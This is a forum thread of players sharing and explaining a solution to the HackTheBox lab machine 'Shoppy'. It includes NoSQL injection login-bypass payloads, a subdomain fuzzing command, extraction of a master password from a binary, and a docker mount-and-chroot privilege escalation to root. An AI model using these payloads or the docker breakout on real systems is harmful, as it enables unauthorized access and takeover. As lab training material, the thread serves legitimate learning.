Posts: 19 Threads: 0 Joined: N/A September 20, 2022 at 9:19 AM (September 18, 2022, 09:40 AM)nhocit Wrote: (September 18, 2022, 09:26 AM)pandu Wrote: (September 18, 2022, 07:57 AM)nhocit Wrote: (September 18, 2022, 07:47 AM)WhiteWolf9007 Wrote: (September 18, 2022, 05:47 AM)br4v0ch4rl33 Wrote: Not only will admin'||'1==1 bypass auth, but also if entered into search field, then it will return user info with hashed passwords.
Finding mattermost subdomain:
ffuf -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.129.1.205 -fs 169
sudo -u deploy /home/deploy/password-manager
where did u get the master password for this ? and also how u knew this command like sudo -l has this access but the recon after that
This way:
cat /home/deploy/password-manager
U will see: Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
Pay attention to this: Access Denided is logging in deny. Before that, it tried to read creds.txt. So We see Access granted is logging in success. So 'Sample' is the master password!
Not able to get access by Sample password
sudo -u deploy /home/deploy/password-manager
Enter password for jaeger. Then master password is required, enter Sample (S is a capital letter). If not then terminate the machine in Hackthebox, and create a new instance! how did u know that Sample is the master password can u elaborate ? Posts: 16 Threads: 0 Joined: N/A September 20, 2022 at 10:47 AM (September 20, 2022, 09:19 AM)sadgedude Wrote: (September 18, 2022, 09:40 AM)nhocit Wrote: (September 18, 2022, 09:26 AM)pandu Wrote: (September 18, 2022, 07:57 AM)nhocit Wrote: (September 18, 2022, 07:47 AM)WhiteWolf9007 Wrote: where did u get the master password for this ? and also how u knew this command like sudo -l has this access but the recon after that
This way:
cat /home/deploy/password-manager
U will see: Welcome to Josh password manager!Please enter your master password: SampleAccess granted! Here is creds !cat /home/deploy/creds.txtAccess denied! This incident will be reported !
Pay attention to this: Access Denided is logging in deny. Before that, it tried to read creds.txt. So We see Access granted is logging in success. So 'Sample' is the master password!
Not able to get access by Sample password
sudo -u deploy /home/deploy/password-manager
Enter password for jaeger. Then master password is required, enter Sample (S is a capital letter). If not then terminate the machine in Hackthebox, and create a new instance!
how did u know that Sample is the master password can u elaborate ? When running cat on the program you see it behind the input field. You can also try extracting the program into cutter or ghidra where it will probably be found just as easy. Posts: 1 Threads: 0 Joined: N/A September 27, 2022 at 3:44 PM (September 17, 2022, 09:28 PM)elliotal Wrote: how to root? if you have successfully logged into @ jaeger with ssh enter the following command : docker run -v /:/mnt --rm -it alpine chroot /mnt sh and ls cd root Posts: 11 Threads: 0 Joined: N/A September 29, 2022 at 9:59 PM (September 17, 2022, 08:00 PM)xurka Wrote: (September 17, 2022, 07:53 PM)elliotal Wrote: if you put username' in the username field, the server couldnt proccess it for some reason
there is injection there that bring us as admin:
admin'||''==='
then we search the same username and get all users hashes
but hashes are uncrackable How you came up with the working injection payload? Posts: 2 Threads: 0 Joined: N/A October 2, 2022 at 6:57 PM (September 27, 2022, 03:44 PM)1amkaizen Wrote: (September 17, 2022, 09:28 PM)elliotal Wrote: how to root?
if you have successfully logged into @jaeger with ssh
enter the following command : docker run -v /:/mnt --rm -it alpine chroot /mnt sh Hello. how you find this command: docker run -v /:/mnt --rm -it alpine chroot /mnt sh ? updated: ls /run => find running docker docker root shell - https://gtfobins.github.io/gtfobins/docker/ Posts: 7 Threads: 0 Joined: N/A October 2, 2022 at 10:37 PM (October 2, 2022, 06:57 PM)iganshan Wrote: (September 27, 2022, 03:44 PM)1amkaizen Wrote: (September 17, 2022, 09:28 PM)elliotal Wrote: how to root?
if you have successfully logged into @jaeger with ssh
enter the following command : docker run -v /:/mnt --rm -it alpine chroot /mnt sh
Hello. how you find this command: docker run -v /:/mnt --rm -it alpine chroot /mnt sh ?
updated:
ls /run => find running docker
docker root shell - https://gtfobins.github.io/gtfobins/docker/ Got permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/create": dial unix /var/run/docker.sock: connect: permission denied. edit: ACHIEVE!! Posts: 0 Threads: 0 Joined: N/A October 3, 2022 at 5:10 PM check this from GTFOBins
This requires the user to be privileged enough to run docker, i.e. being in the docker group or being root. Posts: 3 Threads: 0 Joined: N/A October 6, 2022 at 1:41 PM (September 17, 2022, 10:22 PM)annehathaway Wrote: You can sudo -l to check what commands you can run, you'll see you can run as deploy a tool called password-manager. If you strings on the binary you won't see the password but if you just cat it you'll find deploy's password. Then, you are able to use docker, gtfobins to see how to get a shell as root..
I can't figure out tho how you are able to bypass login auth on shoppy Admin, never seen and couldn't find that admin'||"===' payload if someone can explain it to me please)
its like sql injection but its NOSQL injection https://book.hacktricks.xyz/pentesting-web/nosql-injection ( nosql is the sql biggest competitor, its used a lot in web apps and stands for not only sql) Posts: 18 Threads: 0 Joined: N/A October 8, 2022 at 12:45 PM hey, what kind of hash this admin hash_password ?? trying to figure out crack with john and rockyou but nothing i got. even i include "remembermethisway" in rockyou.txt john can't crack it Posts: 28 Threads: 0 Joined: N/A October 11, 2022 at 9:40 AM (October 8, 2022, 12:45 PM)Halira Wrote: hey, what kind of hash this admin hash_password ?? trying to figure out crack with john and rockyou but nothing i got. even i include "remembermethisway" in rockyou.txt john can't crack it I wasn't able to crack the admin hash either but you don't need it, you only need to crack the hash of user josh. This box had a few neat tricks. There's actually an info disclosure (not sure if intended or not) on that first login page which gives you a heads up that you're looking at a nodejs app. Capture the login POST request with BURP, send it to Repeater and induce an error by setting the 'Content-Type' to 'application/json' and adding a malformed JSON string in the 'POST' data. You get an error which leaks file paths and the username that the nodejs process runs under. <pre>SyntaxError: Unexpected token a in JSON at position 1<br> at JSON.parse (<anonymous>)<br> at parse (/home/jaeger/ShoppyApp/node_modules/body-parser/lib/types/json.js:89:19)<br> at /home/jaeger/ShoppyApp/node_modules/body-parser/lib/read.js:128:18<br> at AsyncResource.runInAsyncScope (node:async_hooks:203:9)<br> at invokeCallback (/home/jaeger/ShoppyApp/node_modules/raw-body/index.js:231:16)<br> at done (/home/jaeger/ShoppyApp/node_modules/raw-body/index.js:220:7)<br> at IncomingMessage.onEnd (/home/jaeger/ShoppyApp/node_modules/raw-body/index.js:280:7)<br> at IncomingMessage.emit (node:events:513:28)<br> at endReadableNT (node:internal/streams/readable:1359:12)<br> at process.processTicksAndRejections (node:internal/process/task_queues:82:21)</pre>
As for the auth bypass, it's basically just abusing boolean logic. The actual code is: const query = { $where: `this.username === '${username}' && this.password === '${passToTest}'` };
The passToTest variable here is our password input hashed. So we can forget about it as an injection point and whatever we '&&' (AND) it with will evaluate to false, but username is controllable. Operator precedence means that the '&&' (AND) operator is executed before the '||' (OR) operator. So we can strategically insert '||' (OR) operators into the username input such that the overall result of the expression is TRUE. There are several options. We don't even need to know a valid username, for example we can use '||true||' for the username and an arbitrary password (cannot be null as there is a check for that earlier in the code). This gives us: this.username === ''||true||'' && this.password === '...'
Evaluates to:
this.username === '' || true || undefined
Evaluates to:
false || true || undefined
Evaluates to:
true
|
